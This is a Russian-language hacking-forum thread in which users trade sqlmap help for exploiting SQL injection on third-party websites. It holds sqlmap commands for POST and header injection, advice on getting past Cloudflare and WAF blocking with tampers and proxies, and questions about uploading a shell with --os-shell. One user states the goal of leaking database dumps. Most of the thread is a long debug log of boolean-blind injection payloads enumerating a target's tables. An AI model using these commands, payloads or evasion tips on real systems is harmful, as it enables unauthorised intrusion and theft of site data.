Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    815
    Reputations:
    90
    :p
     
    _________________________
  2. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    mssql xp_cmdshell
     
  3. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    Предполагаю на сайте POST sql-inj и хочу проверить нмапом.
    Методом POST передаются следующие парметры

    Code:
    1312312312
    Content-Type: text/plain; charset="utf-8"
    Content-disposition: form-data; name="id"
    Code:
    1231212
    Content-Type: text/plain; charset="utf-8"
    Content-disposition: form-data; name="id2"
    Code:
    3312312
    Content-Type: text/plain; charset="utf-8"
    Content-disposition: form-data; name="id3"
    Как указать нмапу, чтобы он пробовал раскрутить параметр id2?
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    -p id2
     
  5. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    Спасибо, но при запросе:
    Code:
    sqlmap\sqlmapproject-sqlmap-67f8c22\sqlmap.py -u "http://site.com/test.php" --method=POST --data="55" '-p=id' --dbs --random-agent
    Мне выходит требование работать по GET несмотря на то, что я мне нужен POST запрос. Как это можно побороть?
    Как можно
    Code:
    [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
     
  6. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    577
    Likes Received:
    48
    Reputations:
    0
    нашел акунетиксом слепую скулю в хедерсах, пытаюсь крутить через sqlmap командой
    Code:
    sqlmap.py -u "url" --headers="User-Agent:test*" --dbs
    но сервер банит примерно через 5-6 запросов (появляется 521 ошибка от клауда)
    пытался добавлять и time-sec и delay - не помогает. есть какие-то варианты обойти бан?
     
  7. Matrix001

    Matrix001 Member

    Joined:
    18 Aug 2016
    Messages:
    124
    Likes Received:
    32
    Reputations:
    0
    Побробуй рандомный user-agent. Еще можешь попробоват через прокси. Но скорее всего Cloud не пропустит.
     
    RedFern.89 likes this.
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Используй тамперы клауд не пропустит запросы
     
    RedFern.89 likes this.
  9. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    577
    Likes Received:
    48
    Reputations:
    0
    пробовал уже и то, и другое
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    сайт.ру/oc/?pg=%2527&pgpos=10&pid=%5c
    Как заставить мамп увидеть дырку?
    она крутится но мамп не видит сука
    по разному пытался не фига
    Code:
    SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '\'; File: /var/www/html/us_production/affiliate/include/Affiliate/Scripts/Bl/ClickRegistrator.class.php; Line: 439</span></center><br><center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT merchant_service_image_path FROM cms_merchant_service_details WHERE merchant_service_id = '
     
  11. Mafter

    Mafter New Member

    Joined:
    29 Mar 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось.
    [​IMG]
    Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection?
    Вот что в ссылке
    [​IMG]
    Перевел с джавы, получилось: "По запросу </strong> не найдено мест в матрице"

    Я думаю написать в sqlmap:
    Code:
    slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3
    Правильно или нет, и надо что-то добавить?
     
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    Нет, не правильно.
    sqlmap -u site --data='Тут То что передаётся ПОСТ методом' для этого вам надо нажать на place_name->variant 1 там будет все необходимые параметы
     
  13. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    у тебя 2 ошибки
    1. Там пост метод надо описать уязвимый пареметр который находится в POST, --data="Тут пост параметр"
    2. Ты не дописал --dbs
    3. (совет) В случае акуши лучше чекни Blind SQL injection, sqlmamp такое быстро взламывает (лично у меня так)
     
  14. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,770
    Likes Received:
    13,918
    Reputations:
    116
    враньё какое ...
     
    olegan2157 likes this.
  15. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    У меня этот тип дыр SQLmap быстро вскрывает
     
  16. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,770
    Likes Received:
    13,918
    Reputations:
    116
    Ого, таки похекал ту ico корпорацию?
     
    BabaDook likes this.
  17. Mafter

    Mafter New Member

    Joined:
    29 Mar 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    а если в Blind SQL injection тоже самое, что и в SQL injection?? То есть, ссылки одинаковые
     
  18. Миxей

    Миxей Member

    Joined:
    26 Aug 2009
    Messages:
    0
    Likes Received:
    12
    Reputations:
    0
    Как залить Shell посредством sqlmap ?
    --os-shell и брутить локальные пути ?
     
  19. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    93
    Likes Received:
    69
    Reputations:
    3
    Тебе в соседней теме ответили, у пользователя под которым ты сидишь не хватает прав для этого!
     
  20. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    577
    Likes Received:
    48
    Reputations:
    0
    Подскажите, как бороться? Пытаюсь получить таблицы - выдает 406 ошибку
    Code:
    sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66
    --dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --
    tables
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.2.4.2#dev}
    |_ -| . [)]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
     consent is illegal. It is the end user's responsibility to obey all applicable
    local, state and federal laws. Developers assume no liability and are not respon
    sible for any misuse or damage caused by this program
    
    [*] starting at 01:56:40
    
    [01:56:40] [INFO] parsing HTTP request from '1.txt'
    [01:56:40] [DEBUG] not a valid WebScarab log data
    [01:56:40] [DEBUG] cleaning up configuration parameters
    [01:56:40] [DEBUG] loading WAF script '360'
    [01:56:40] [DEBUG] loading WAF script 'airlock'
    [01:56:40] [DEBUG] loading WAF script 'anquanbao'
    [01:56:40] [DEBUG] loading WAF script 'armor'
    [01:56:40] [DEBUG] loading WAF script 'asm'
    [01:56:40] [DEBUG] loading WAF script 'aws'
    [01:56:40] [DEBUG] loading WAF script 'baidu'
    [01:56:40] [DEBUG] loading WAF script 'barracuda'
    [01:56:40] [DEBUG] loading WAF script 'bigip'
    [01:56:40] [DEBUG] loading WAF script 'binarysec'
    [01:56:40] [DEBUG] loading WAF script 'blockdos'
    [01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
    [01:56:40] [DEBUG] loading WAF script 'cloudflare'
    [01:56:40] [DEBUG] loading WAF script 'cloudfront'
    [01:56:40] [DEBUG] loading WAF script 'comodo'
    [01:56:40] [DEBUG] loading WAF script 'datapower'
    [01:56:40] [DEBUG] loading WAF script 'denyall'
    [01:56:40] [DEBUG] loading WAF script 'dosarrest'
    [01:56:40] [DEBUG] loading WAF script 'dotdefender'
    [01:56:40] [DEBUG] loading WAF script 'edgecast'
    [01:56:40] [DEBUG] loading WAF script 'expressionengine'
    [01:56:40] [DEBUG] loading WAF script 'fortiweb'
    [01:56:40] [DEBUG] loading WAF script 'generic'
    [01:56:40] [DEBUG] loading WAF script 'hyperguard'
    [01:56:40] [DEBUG] loading WAF script 'incapsula'
    [01:56:40] [DEBUG] loading WAF script 'isaserver'
    [01:56:40] [DEBUG] loading WAF script 'jiasule'
    [01:56:40] [DEBUG] loading WAF script 'knownsec'
    [01:56:40] [DEBUG] loading WAF script 'kona'
    [01:56:40] [DEBUG] loading WAF script 'modsecurity'
    [01:56:40] [DEBUG] loading WAF script 'naxsi'
    [01:56:40] [DEBUG] loading WAF script 'netcontinuum'
    [01:56:40] [DEBUG] loading WAF script 'netscaler'
    [01:56:40] [DEBUG] loading WAF script 'newdefend'
    [01:56:40] [DEBUG] loading WAF script 'nsfocus'
    [01:56:40] [DEBUG] loading WAF script 'paloalto'
    [01:56:40] [DEBUG] loading WAF script 'profense'
    [01:56:40] [DEBUG] loading WAF script 'proventia'
    [01:56:40] [DEBUG] loading WAF script 'radware'
    [01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
    [01:56:40] [DEBUG] loading WAF script 'safe3'
    [01:56:40] [DEBUG] loading WAF script 'safedog'
    [01:56:40] [DEBUG] loading WAF script 'secureiis'
    [01:56:40] [DEBUG] loading WAF script 'senginx'
    [01:56:40] [DEBUG] loading WAF script 'sitelock'
    [01:56:40] [DEBUG] loading WAF script 'sonicwall'
    [01:56:40] [DEBUG] loading WAF script 'sophos'
    [01:56:40] [DEBUG] loading WAF script 'stingray'
    [01:56:40] [DEBUG] loading WAF script 'sucuri'
    [01:56:40] [DEBUG] loading WAF script 'tencent'
    [01:56:40] [DEBUG] loading WAF script 'teros'
    [01:56:40] [DEBUG] loading WAF script 'trafficshield'
    [01:56:40] [DEBUG] loading WAF script 'urlscan'
    [01:56:40] [DEBUG] loading WAF script 'uspses'
    [01:56:40] [DEBUG] loading WAF script 'varnish'
    [01:56:40] [DEBUG] loading WAF script 'wallarm'
    [01:56:40] [DEBUG] loading WAF script 'watchguard'
    [01:56:40] [DEBUG] loading WAF script 'webappsecure'
    [01:56:40] [DEBUG] loading WAF script 'webknight'
    [01:56:40] [DEBUG] loading WAF script 'wordfence'
    [01:56:40] [DEBUG] loading WAF script 'yundun'
    [01:56:40] [DEBUG] loading WAF script 'yunsuo'
    [01:56:40] [DEBUG] loading WAF script 'zenedge'
    [01:56:40] [DEBUG] setting the HTTP timeout
    [01:56:40] [DEBUG] creating HTTP requests opener object
    [01:56:40] [DEBUG] forcing back-end DBMS to user defined value
    custom injection marker ('*') found in option '--data'. Do you want to process i
    t? [Y/n/q] y
    [01:56:41] [DEBUG] resolving hostname 'url'
    [01:56:41] [INFO] testing connection to the target URL
    [01:56:41] [DEBUG] declared web page charset 'utf-8'
    [01:56:41] [CRITICAL] previous heuristics detected that the target is protected
    by some kind of WAF/IPS/IDS
    [01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewal
    l (360)'
    [01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
    [01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application F
    irewall (Anquanbao)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Def
    ense)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manage
    r (F5 Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web App
    lication Firewall (Amazon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Fi
    rewall (Baidu)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application F
    irewall (Barracuda Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security
     Manager (F5 Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application F
    irewall (BinarySEC)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisc
    o Systems)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application
    Firewall (CloudFlare)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Fire
    wall (Comodo)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IB
    M)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Fi
    rewall (DenyAll)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Intern
    et Security)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Tech
    nologies)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)
    '
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Fi
    rewall (Fortinet)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application
    Firewall (art of defence)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application F
    irewall (Incapsula/Imperva)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Fir
    ewall (Jiasule)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Ak
    amai Technologies)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source We
    b Application Firewall (Trustwave)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Applicatio
    n Firewall (NetContinuum/Barracuda Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'
    
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application F
    irewall (Newdefend)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Fir
    ewall (NSFOCUS)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Al
    to Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Fi
    rewall (Armorlogic)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application S
    ecurity (IBM)'
    [01:56:42] [DEBUG] page not found (404)
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMo
    de (Microsoft)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firew
    all'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Fir
    ewall (Safedog)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Securi
    ty (BeyondTrust)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporatio
    n)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application
    Firewall (SiteLock)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)
    '
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewa
    ll (Riverbed / Brocade)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall
     (Sucuri)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Applicati
    on Firewall (Tencent Cloud Computing)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Fi
    rewall Enterprise (Teros/Citrix Systems)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)
    '
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (Un
    ited Security Providers)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Fir
    ewall (Wallarm)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Tech
    nologies)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'
    
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firew
    all (AQTRONIX)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Fire
    wall (Yundun)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Fire
    wall (Yunsuo)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Fir
    ewall (Zenedge)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
    [01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
    [01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\art
    em\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the
    details on used protection please report it along with specific response to 'dev
    @sqlmap.org'
    are you sure that you want to continue with further target testing? [y/N] y
    [01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')
    
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* ((custom) POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
        Vector: AND [INFERENCE]
    ---
    [01:56:44] [INFO] testing MySQL
    [01:56:44] [DEBUG] resuming configuration option 'code' (200)
    [01:56:44] [INFO] confirming MySQL
    [01:56:44] [INFO] the back-end DBMS is MySQL
    [01:56:44] [INFO] fetching banner
    [01:56:44] [INFO] resumed: 5.6.39-cll-lve
    [01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
    web application technology: Apache, PHP 7.1.14
    back-end DBMS: MySQL >= 5.0.0
    banner:    '5.6.39-cll-lve'
    [01:56:44] [INFO] fetching tables for database: 'database'
    [01:56:44] [INFO] fetching number of tables for database 'database'
    [01:56:44] [WARNING] running in a single-thread mode. Please consider usage of o
    ption '--threads' for faster data retrieval
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
    CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51
     AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
    ation step in similar cases
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
    CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48
     AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
    CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9
    AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [INFO] retrieved:
    [01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
    [01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
    [01:56:44] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] n
    No tables found
    [01:56:46] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
    [01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
     kind of protection is involved (e.g. WAF)
    [01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlma
    p\output\url'
    
     
Loading...